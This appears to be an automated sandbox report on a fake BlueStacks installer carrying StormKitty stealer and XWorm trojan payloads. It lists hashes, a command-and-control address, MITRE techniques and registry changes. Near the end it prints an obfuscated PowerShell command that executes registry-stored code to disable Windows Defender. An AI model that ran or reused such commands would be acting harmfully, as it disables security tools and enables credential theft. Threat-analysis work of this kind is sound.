stormkitty | 96bd9c9e7ff547805dce20e583aa95e3a047db2d01c1984549a825fa5f04f7c0

Analysis

max time kernel
389s
max time network
393s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
11-09-2024 10:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BlueStacksInstaller_5.21.550.1031_native_a84df0a742c64361a047a75521553ed5_MDs1LDM7MTUsMTsxNSw0OzE1LA==.exe
Size

913KB
MD5

f88ed174d2848207ff096424f705257b
SHA1

2186f6b58eb9cb2b7434071f2719426c43cc004b
SHA256

96bd9c9e7ff547805dce20e583aa95e3a047db2d01c1984549a825fa5f04f7c0
SHA512

4307f8ce28c62758f80bc3f38c096da68ceb0cb444c3b055159eabf408f2ac8ac0dd9bac156d77a454c6c48a7c00cff94c63fb594c0ce5106fbb8df32b379e17
SSDEEP

24576:vivtCXWeGKj8f7bi7iruGKW2loYW+wTZvlfk:KtCXWP/nieolonlN9fk

Score

10^/10

stormkitty xworm credential_access defense_evasion discovery evasion execution rat stealer trojan

Malware Config

Extracted

Family

xworm

193.161.193.99:24469

Attributes

Install_directory
%Temp%
install_file
USB.exe

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/1400-959-0x00000128C6090000-0x00000128C609E000-memory.dmp	disable_win_def

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1400-784-0x00000128DE4B0000-0x00000128DE4C6000-memory.dmp	family_xworm

Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
evasion trojan

Modify Registry
T1112

Windows Service
T1543.003

Disable or Modify Tools
T1562.001

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe

StormKitty payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1400-1026-0x00000128DEB10000-0x00000128DEC30000-memory.dmp	family_stormkitty

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1400 created 712 1400 powershell.exe lsass.exe
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

83 1400 powershell.exe
84 1400 powershell.exe
86 1400 powershell.exe
89 1400 powershell.exe
94 1400 powershell.exe

description	pid	process	target process
PID 1400 created 712	1400	powershell.exe	lsass.exe

flow	pid	process
83	1400	powershell.exe
84	1400	powershell.exe
86	1400	powershell.exe
89	1400	powershell.exe
94	1400	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1552	powershell.exe
1400	powershell.exe
2400	powershell.exe
2056	powershell.exe
2056	powershell.exe
1552	powershell.exe
2360	powershell.exe
1400	powershell.exe
2400	powershell.exe
2604	powershell.exe
4952	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSystem.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSystem.lnk	powershell.exe

Downloads MZ/PE file
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

28 discord.com
29 discord.com
30 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

82 ip-api.com

flow	ioc
28	discord.com
29	discord.com
30	discord.com

flow	ioc
82	ip-api.com

Drops file in Windows directory 4 IoCs

Processes:

UserOOBEBroker.exe

description	ioc	process
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe

Executes dropped EXE 6 IoCs

Processes:

BlueStacksInstaller.exeHD-CheckCpu.exeHD-CheckCpu.exeHybridloggerV5.5.exeHybridloggerV5.5.exeVencordInstaller.exe

pid process

3132 BlueStacksInstaller.exe
2928 HD-CheckCpu.exe
5060 HD-CheckCpu.exe
4792 HybridloggerV5.5.exe
3708 HybridloggerV5.5.exe
1920 VencordInstaller.exe
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

2396 sc.exe
1884 sc.exe
1188 sc.exe

pid	process
2396	sc.exe
1884	sc.exe
1188	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

Processes:

msedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\HybridloggerV5.5.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\VencordInstaller.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

FileCoAuth.exeFileCoAuth.exeFileCoAuth.exeDllHost.exeDllHost.exeBlueStacksInstaller_5.21.550.1031_native_a84df0a742c64361a047a75521553ed5_MDs1LDM7MTUsMTsxNSw0OzE1LA==.exeHD-CheckCpu.exeFileCoAuth.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlueStacksInstaller_5.21.550.1031_native_a84df0a742c64361a047a75521553ed5_MDs1LDM7MTUsMTsxNSw0OzE1LA==.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HD-CheckCpu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Modifies registry class 5 IoCs

Processes:

msedge.exepowershell.exepowershell.exemsedge.exeCastSrv.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4272559161-3282441186-401869126-1000\{4A4A7EFC-EF2A-456D-B047-474C7C5DD2DB}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Extensions\ContractId\Windows.Protocol\PackageId	CastSrv.exe

NTFS ADS 4 IoCs

Processes:

msedge.exemsedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\VencordInstaller.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 4659.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\HybridloggerV5.5.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 163728.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

BlueStacksInstaller.exemsedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exe

pid	process
3132	BlueStacksInstaller.exe
3132	BlueStacksInstaller.exe
3132	BlueStacksInstaller.exe
3132	BlueStacksInstaller.exe
3132	BlueStacksInstaller.exe
3132	BlueStacksInstaller.exe
4448	msedge.exe
4448	msedge.exe
3512	msedge.exe
3512	msedge.exe
2720	msedge.exe
2720	msedge.exe
4464	identity_helper.exe
4464	identity_helper.exe
2296	msedge.exe
2296	msedge.exe
3656	msedge.exe
3656	msedge.exe
1552	powershell.exe
1552	powershell.exe
1552	powershell.exe
2360	powershell.exe
2360	powershell.exe
2360	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

powershell.exe

pid process

1400 powershell.exe
Suspicious behavior: LoadsDriver 6 IoCs

Processes:

pid

4
4
4
4
4
692

pid	process
1400	powershell.exe

pid
4
4
4
4
4
692

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 27 IoCs

Processes:

msedge.exe

pid	process
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

BlueStacksInstaller.exeAUDIODG.EXEpowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3132	BlueStacksInstaller.exe
Token: 33	1244	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1244	AUDIODG.EXE
Token: SeDebugPrivilege	1552	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeIncreaseQuotaPrivilege	2360	powershell.exe
Token: SeSecurityPrivilege	2360	powershell.exe
Token: SeTakeOwnershipPrivilege	2360	powershell.exe
Token: SeLoadDriverPrivilege	2360	powershell.exe
Token: SeSystemProfilePrivilege	2360	powershell.exe
Token: SeSystemtimePrivilege	2360	powershell.exe
Token: SeProfSingleProcessPrivilege	2360	powershell.exe
Token: SeIncBasePriorityPrivilege	2360	powershell.exe
Token: SeCreatePagefilePrivilege	2360	powershell.exe
Token: SeBackupPrivilege	2360	powershell.exe
Token: SeRestorePrivilege	2360	powershell.exe
Token: SeShutdownPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeSystemEnvironmentPrivilege	2360	powershell.exe
Token: SeRemoteShutdownPrivilege	2360	powershell.exe
Token: SeUndockPrivilege	2360	powershell.exe
Token: SeManageVolumePrivilege	2360	powershell.exe
Token: 33	2360	powershell.exe
Token: 34	2360	powershell.exe
Token: 35	2360	powershell.exe
Token: 36	2360	powershell.exe
Token: SeIncreaseQuotaPrivilege	2360	powershell.exe
Token: SeSecurityPrivilege	2360	powershell.exe
Token: SeTakeOwnershipPrivilege	2360	powershell.exe
Token: SeLoadDriverPrivilege	2360	powershell.exe
Token: SeSystemProfilePrivilege	2360	powershell.exe
Token: SeSystemtimePrivilege	2360	powershell.exe
Token: SeProfSingleProcessPrivilege	2360	powershell.exe
Token: SeIncBasePriorityPrivilege	2360	powershell.exe
Token: SeCreatePagefilePrivilege	2360	powershell.exe
Token: SeBackupPrivilege	2360	powershell.exe
Token: SeRestorePrivilege	2360	powershell.exe
Token: SeShutdownPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeSystemEnvironmentPrivilege	2360	powershell.exe
Token: SeRemoteShutdownPrivilege	2360	powershell.exe
Token: SeUndockPrivilege	2360	powershell.exe
Token: SeManageVolumePrivilege	2360	powershell.exe
Token: 33	2360	powershell.exe
Token: 34	2360	powershell.exe
Token: 35	2360	powershell.exe
Token: 36	2360	powershell.exe
Token: SeIncreaseQuotaPrivilege	2360	powershell.exe
Token: SeSecurityPrivilege	2360	powershell.exe
Token: SeTakeOwnershipPrivilege	2360	powershell.exe
Token: SeLoadDriverPrivilege	2360	powershell.exe
Token: SeSystemProfilePrivilege	2360	powershell.exe
Token: SeSystemtimePrivilege	2360	powershell.exe
Token: SeProfSingleProcessPrivilege	2360	powershell.exe
Token: SeIncBasePriorityPrivilege	2360	powershell.exe
Token: SeCreatePagefilePrivilege	2360	powershell.exe
Token: SeBackupPrivilege	2360	powershell.exe
Token: SeRestorePrivilege	2360	powershell.exe
Token: SeShutdownPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeSystemEnvironmentPrivilege	2360	powershell.exe
Token: SeRemoteShutdownPrivilege	2360	powershell.exe
Token: SeUndockPrivilege	2360	powershell.exe
Token: SeManageVolumePrivilege	2360	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe

Suspicious use of SendNotifyMessage 62 IoCs

Processes:

msedge.exe

pid	process
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe
3512	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

powershell.exeVencordInstaller.exe

pid process

1400 powershell.exe
1920 VencordInstaller.exe

pid	process
1400	powershell.exe
1920	VencordInstaller.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

BlueStacksInstaller_5.21.550.1031_native_a84df0a742c64361a047a75521553ed5_MDs1LDM7MTUsMTsxNSw0OzE1LA==.exeBlueStacksInstaller.exemsedge.exe

description	pid	process	target process
PID 2552 wrote to memory of 3132	2552	BlueStacksInstaller_5.21.550.1031_native_a84df0a742c64361a047a75521553ed5_MDs1LDM7MTUsMTsxNSw0OzE1LA==.exe	BlueStacksInstaller.exe
PID 2552 wrote to memory of 3132	2552	BlueStacksInstaller_5.21.550.1031_native_a84df0a742c64361a047a75521553ed5_MDs1LDM7MTUsMTsxNSw0OzE1LA==.exe	BlueStacksInstaller.exe
PID 3132 wrote to memory of 2928	3132	BlueStacksInstaller.exe	HD-CheckCpu.exe
PID 3132 wrote to memory of 2928	3132	BlueStacksInstaller.exe	HD-CheckCpu.exe
PID 3132 wrote to memory of 2928	3132	BlueStacksInstaller.exe	HD-CheckCpu.exe
PID 3132 wrote to memory of 5060	3132	BlueStacksInstaller.exe	HD-CheckCpu.exe
PID 3132 wrote to memory of 5060	3132	BlueStacksInstaller.exe	HD-CheckCpu.exe
PID 3132 wrote to memory of 5060	3132	BlueStacksInstaller.exe	HD-CheckCpu.exe
PID 3512 wrote to memory of 4424	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4424	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 1444	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4448	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4448	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe
PID 3512 wrote to memory of 4216	3512	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  PID:4952
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    PID:2396
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    PID:3464
- - C:\Windows\system32\whoami.exe
